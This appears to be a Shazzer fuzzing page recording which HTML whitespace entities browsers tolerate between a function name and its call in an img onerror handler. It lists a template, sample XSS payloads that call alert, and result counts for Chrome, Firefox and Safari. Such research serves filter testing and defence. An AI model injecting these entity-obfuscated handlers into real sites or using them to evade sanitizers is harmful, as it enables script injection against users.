Entities allowed between function calls
This vector uses Shazzer's new features to check which entities are allowed between a function call using images. The results are a bit inconsistent yet because I currently wait for page load.
Created by: hackvertor
Created on: Saturday, June 29, 2024 at 1:55:26 PM
Updated on: Tuesday, May 27, 2025 at 8:16:09 AM
Category: Entity Parsing
Vector visibility: Public
Vector type: XSS
Vector charset: UTF-8
Vector data 1: html_entities
Template used:
<img src=data: onerror="log$[data1]('html($[data1])')">Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<img src=data: onerror="alert ('&ThinSpace;')"><img src=data: onerror="alert ('&puncsp;')"><img src=data: onerror="alert ('&MediumSpace;')"><img src=data: onerror="alert ('&thinsp;')"><img src=data: onerror="alert ('&hairsp;')"><img src=data: onerror="alert ('&emsp;')"><img src=data: onerror="alert ('&NonBreakingSpace;')"><img src=data: onerror="alert
('&NewLine;')"><img src=data: onerror="alert ('&emsp13;')"><img src=data: onerror="alert ('&emsp14;')"><img src=data: onerror="alert ('&ensp;')"><img src=data: onerror="alert	('&Tab;')"><img src=data: onerror="alert ('&nbsp;')"><img src=data: onerror="alert ('&numsp;')"><img src=data: onerror="alert ('&VeryThinSpace;')"><img src=data: onerror="alert  ('&ThickSpace;')">Fuzz results
Chrome 126.0.0.0 desktop macOS 10.15.7
Updated
Sat Jun 29 2024
Found 8 results
Loading...
Firefox 127.0 desktop macOS 10.15
Updated
Sat Jun 29 2024
Found 4 results
Loading...
Safari 17.4 desktop macOS 10.15.7
Updated
Sat Jun 29 2024
Found 2 results
Loading...
Safari 17.5 mobile iOS 17.5.1
Updated
Sun Jun 30 2024
Found 6 results
Loading...
Chrome 141.0.0.0 desktop Windows NT 10.0
Updated
Fri Oct 31 2025
Found 16 results
Loading...
